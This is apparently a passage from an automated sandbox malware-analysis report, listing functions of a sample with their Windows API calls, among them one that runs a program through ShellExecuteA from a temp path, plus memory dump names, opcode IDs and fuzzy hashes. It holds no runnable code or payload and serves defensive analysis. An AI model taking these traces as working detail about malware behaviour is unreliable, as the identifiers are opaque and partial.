                                                            • Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040FFB8, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040FF7C: DestroyCursor.USER32(00000000), ref: 0040FF8B
                                                            • GetIconInfo.USER32(?), ref: 0040FFD8
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0040FFE9
                                                            • DeleteObject.GDI32(?), ref: 0040FFFE
                                                            • DeleteObject.GDI32(?), ref: 0041000C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$Delete$CursorDestroyIconInfo
                                                            • String ID:
                                                            • API String ID: 3133107492-0
                                                            • Opcode ID: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                            • Instruction ID: 2d28933f0b2e023a71d2f14a39f9032314a54afd7f494d7512fc5867bd48f6a1
                                                            • Opcode Fuzzy Hash: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                            • Instruction Fuzzy Hash: 67F06271A043155BCB14EEB99CC1A8B769C9F48754B00482AB850E7342E7B8DC8487E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004105E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteIconInfoObject
                                                            • String ID: ,k@
                                                            • API String ID: 2689914137-1053005162
                                                            • Opcode ID: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                            • Instruction ID: 6eb33a66848ac9ac3950d349fa1ce54abc8aaa9849f71adcceb630d577d3c1da
                                                            • Opcode Fuzzy Hash: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                            • Instruction Fuzzy Hash: B7414C71E0021A9FDF10DF99C881AAEBBB4FF48318F11406AD911B7381D778AD95CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041133E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
                                                              • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
                                                              • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
                                                            • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                            • String ID: open
                                                            • API String ID: 2622400689-2758837156
                                                            • Opcode ID: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                            • Instruction ID: ca9bbc1aa8f47e6c3f9ee794e5cc2909a51f6400e8153674fcf191bbd04044bb
                                                            • Opcode Fuzzy Hash: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                            • Instruction Fuzzy Hash: D211ED70F043198EEB10FB79CC81A89B375EF86308F4049B6A008B7191D67E6E858E5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%